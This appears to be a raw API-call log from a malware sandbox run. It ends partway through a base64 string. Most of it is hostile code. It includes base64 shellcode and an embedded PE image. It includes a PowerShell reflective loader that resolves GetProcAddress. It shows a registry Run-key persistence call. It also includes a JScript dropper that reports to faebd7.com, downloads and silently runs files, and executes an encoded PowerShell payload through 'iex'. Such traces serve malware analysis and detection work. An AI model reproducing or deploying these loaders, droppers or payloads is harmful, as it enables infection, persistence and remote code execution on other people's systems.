APGAIt4IItQHItYACSLQBgD1gPeAAP+iVXsiV3oAIlF5IXAD4SCgLEA6wuLcRjryQCLVeyLXeiLRQD4iwyHD7cEQwCLFIKDZfwAAwDOiU30jUXEAwDWKUX0i0X8iwBd9APYikQFxAA6RB3EdQn/RQH8g338DXLlCkFQN5BYBc4VTaQAM8ApTfSLTfQAilwFpAPIOlwADaR1BkCD+A8ycusI4BTw/9JQBIC/U0QuV9hYBEALZfVfBb+In9FYRC0xjQCeQMUHIoHG0RdqQGh1AwAAA97/c1CJRegBagD/14lF+IEQQBw9BItLVINl9AAAi/jzpA+3SwAUjVQZIDPJZgA7SwZzM4tKCACLMjvOdgKLzgCFyXQVi30IiwhyDIHHpjFwvwihRzBgNgb/RfQAg8IoOU30cs0Ai3A8A/CLjoCAMwGDfAEMAHRJQI0MsPgwgBz1D7wL8BZBt7L4RTAA0IW/7rE4UAgMkFfwcAu8frAI0ITfSIQgAPUPUkceCJA4MDhMQDC4A1DXnQwweAxAMfgDULe76AhEqgqJTeCLjqCAELCIveJFM4AMMFgGD7Bes1gFAJ5TBT9H02gFgB+tThfSmIcAkFhF/3B7YVYYIE23ECj+/zAGABARwCEweCzwD9BEX1ceUAc/AOC8GEdQaF9HDLCIxLPIhICiBgCgFvBfhzCADPIffQRQoKbyXzWA/uU1A7y1gNGUEofRlJAqcabQWItekUCBDq7QqPDQEVAIHIKLV4BQV4DLxwDAawo8AYWGZCojoYAGFAcTkACHAICRNvA7cB7QWAifjgB1tY5AkW0wSAyymII9ZTJQstSbkGtAUIcwhIZrBovGCVNQ6HzMsIidrzBQuE13pQbQpeAlCFP/FczrGfCF9gx+OWhgTSowYkyIVuMQRQe0Azcbg8AEBCvwjYwsgv4JWBKwiIz+lv//T5FYxK8I1IpRxH/y5RUOhQuRxJUO8gN1Ugh/uoFGJQ1BACVsAGoCWzvDD4Uk2OEYUQqkfStUclwA5XEqI+EC7wOIBHEVQPRQkKVG4JVYNEC/Y/wwKM4EbsQYIgCQ2GEX9yCDxFEMa0S+lFGHv5u6MSADvLifCzCnoDxCAzQwr4q+kgaQyFKEgBWIItASMpVYVCMU/xWgHTFyvQYAyyvIAU0Ii/AAi0UIi8iL+/MKpI1w/xAwjDk" [0035.937] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"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", lpSrch="{ps_shellcode_length}") returned 0x0 [0035.944] VirtualAlloc (lpAddress=0x0, dwSize=0x72c4, flAllocationType=0x3000, flProtect=0x4) returned 0x3c0000 [0035.945] GetVersionExA (in: lpVersionInformation=0x18f0a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f0a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0035.945] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x18f01c, lpdwDisposition=0x0 | out: phkResult=0x18f01c*=0x234, lpdwDisposition=0x0) returned 0x0 [0035.945] VirtualAlloc (lpAddress=0x0, dwSize=0x12580, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0035.945] _snwprintf (in: _Dest=0x3d0000, _Count=0x1257f, _Format="function log(l){try{x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://faebd7.com/log?log=\"+l,false);x.send();return 1;}catch(e){return 0;}}e=123;a=new ActiveXObject(\"WScript.Shell\");while(e!=42){try{w=a.ExpandEnvironmentStrings(\"%%windir%%\");p=w+\"\\\\%s\\\\windowspowershell\\\\v1.0\\\\powershell.exe\";f=new ActiveXObject(\"Scripting.FileSystemObject\");function cdn(){try{return a.RegRead(\"HKLM\\\\software\\\\microsoft\\\\net framework setup\\\\ndp\\\\v2.0.50727\\\\sp\");}catch(e){return 0;}}function d(u){x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",u,false);x.send();ufn=a.ExpandEnvironmentStrings(\"%%temp%%\\\\\")+u.substring(u.lastIndexOf(\"/\")+1);ufnt=ufn+\".tmp\";uft=f.CreateTextFile(ufnt,true,-1);if(uft){uft.Write(x.responseBody);uft.Close();uf=f.CreateTextFile(ufn,true);uft=f.GetFile(ufnt);ufs=uft.OpenAsTextStream();ufs.Read(2);uf.Write(ufs.Read(uft.Size-2));ufs.Close();uf.Close();f.DeleteFile(ufnt);a.Run(\"\\\"\"+ufn+\"\\\" /quiet /norestart\",0,1);f.DeleteFile(ufn);}}while(!f.FileExists(p)){if(cdn()==0){d(\"%s\");}d(\"%s\");}(a.Environment(\"Process\"))(\"a\")=\"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('%S')))\";e=a.Run(p+\" iex $env:a\",0,1);}catch(e){log(\"scriptexcept_\"+e.message);close();}};close();" | out: _Dest="function log(l){try{x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://faebd7.com/log?log=\"+l,false);x.send();return 1;}catch(e){return 0;}}e=123;a=new ActiveXObject(\"WScript.Shell\");while(e!=42){try{w=a.ExpandEnvironmentStrings(\"%windir%\");p=w+\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\";f=new ActiveXObject(\"Scripting.FileSystemObject\");function cdn(){try{return a.RegRead(\"HKLM\\\\software\\\\microsoft\\\\net framework setup\\\\ndp\\\\v2.0.50727\\\\sp\");}catch(e){return 0;}}function d(u){x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",u,false);x.send();ufn=a.ExpandEnvironmentStrings(\"%temp%\\\\\")+u.substring(u.lastIndexOf(\"/\")+1);ufnt=ufn+\".tmp\";uft=f.CreateTextFile(ufnt,true,-1);if(uft){uft.Write(x.responseBody);uft.Close();uf=f.CreateTextFile(ufn,true);uft=f.GetFile(ufnt);ufs=uft.OpenAsTextStream();ufs.Read(2);uf.Write(ufs.Read(uft.Size-2));ufs.Close();uf.Close();f.DeleteFile(ufnt);a.Run(\"\\\"\"+ufn+\"\\\" /quiet /norestart\",0,1);f.DeleteFile(ufn);}}while(!f.FileExists(p)){if(cdn()==0){d(\"\");}d(\"\");}(a.Environment(\"Process\"))(\"a\")=\"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTT